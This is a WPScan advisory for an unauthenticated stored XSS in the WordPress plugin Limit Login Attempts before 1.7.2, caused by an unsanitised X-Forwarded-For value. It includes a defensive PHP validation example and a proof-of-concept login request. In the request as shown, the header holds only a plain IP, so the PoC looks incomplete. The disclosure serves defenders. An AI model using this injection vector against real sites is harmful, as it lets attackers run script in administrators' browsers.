wpvulndb WPVDB-ID: F36FA18F-A47F-43EE-B0F8-16D1044A328D
History: Apr 06, 2023 - 12:00 a.m.

Limit Login Attempts < 1.7.2 - Unauthenticated Stored XSS

2023-04-06 00:00:00
wpscan.com
Tags: limit login attempts, unauthenticated, stored xss, vulnerability, ip address header, attackers, security fix

EPSS: 0.002 (Low), Percentile: 59.2%

The plugin does not sanitize and escape the IP address retrieved from headers such as X-Forwarded-For when the “Site Connection” setting is set to “From behind a reversy proxy”, which could allow unauthenticated attackers to perform Stored Cross-Site Scripting attacks against administrators who view the plugin's lockout log.
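As an added illustration (not the plugin's own code), this is the defender-side handling the description implies: consult X-Forwarded-For only when the reverse-proxy setting is enabled, keep the value only if it parses as an IP address, and escape it when the log page renders it. The function names, the `$trustProxy` flag and the two sample requests are constructed for the example.

```php
<?php
// Added defensive example, not code from the Limit Login Attempts plugin.

/**
 * Return a validated client IP, or null when the candidate is not an IP at all.
 * $trustProxy stands in for the plugin's "From behind a reversy proxy" setting:
 * only then is X-Forwarded-For consulted, and only its left-most element
 * (the header is a comma-separated "client, proxy1, proxy2" list).
 */
function resolve_client_ip(array $server, bool $trustProxy): ?string
{
    $candidate = $server['REMOTE_ADDR'] ?? '';
    if ($trustProxy && !empty($server['HTTP_X_FORWARDED_FOR'])) {
        $parts = explode(',', $server['HTTP_X_FORWARDED_FOR']);
        $candidate = trim($parts[0]);
    }
    // Reject anything that is not a syntactically valid IPv4/IPv6 address,
    // so markup or other arbitrary text never reaches the lockout log.
    $ip = filter_var($candidate, FILTER_VALIDATE_IP);
    return $ip === false ? null : $ip;
}

/**
 * Render one lockout-log row. Output escaping is applied even to data that
 * was validated on input; htmlspecialchars() with ENT_QUOTES is the plain-PHP
 * equivalent of WordPress's esc_html().
 */
function render_log_row(string $ip, int $attempts): string
{
    $safeIp = htmlspecialchars($ip, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<tr><td>{$safeIp}</td><td>{$attempts}</td></tr>";
}

// Constructed sample requests: a legitimately proxied client, and a request
// whose forwarded header carries text that is not an IP address.
$proxied = ['REMOTE_ADDR' => '10.0.0.5', 'HTTP_X_FORWARDED_FOR' => '22.22.22.22, 10.0.0.5'];
$bogus   = ['REMOTE_ADDR' => '10.0.0.5', 'HTTP_X_FORWARDED_FOR' => '<b>not-an-ip</b>'];

var_dump(resolve_client_ip($proxied, true));   // header trusted, first element taken
var_dump(resolve_client_ip($bogus, true));     // header trusted but invalid: rejected
var_dump(resolve_client_ip($bogus, false));    // setting off: header ignored entirely
echo render_log_row('22.22.22.22', 4), PHP_EOL;
```

A null result should be treated as "no usable client address" (for instance, log and skip the counter update) rather than silently falling back to the proxy's own address, which would rate-limit every user behind that proxy.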

PoC

Setup: As admin, set the “Site Connection” setting to “From behind a reversy proxy” (/wp-admin/options-general.php?page=limit-login-attempts).

As unauthenticated, make multiple invalid login attempts with the following X-Forwarded-For header: 22.22.22.22

POST /wp-login.php HTTP/2
Cookie: _ga=GA1.1.1425100944.1668087471; _ga_1PQ8LT9B4M=GS1.1.1668092159.2.0.1668092159.0.0.0; _ga_NCY6KM92V3=GS1.1.1670952626.1.0.1670952626.60.0.0; wordpress_test_cookie=WP%20Cookie%20check
Content-Length: 124
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
X-Forwarded-For: 22.22.22.22

log=test&pwd=test&wp-submit=Log+In&testcookie=1

The XSS will be triggered when viewing the logs: https://example.com/wp-admin/options-general.php?page=limit-login-attempts

CPE Name              Operator  Version
limit-login-attempts  lt        1.7.2

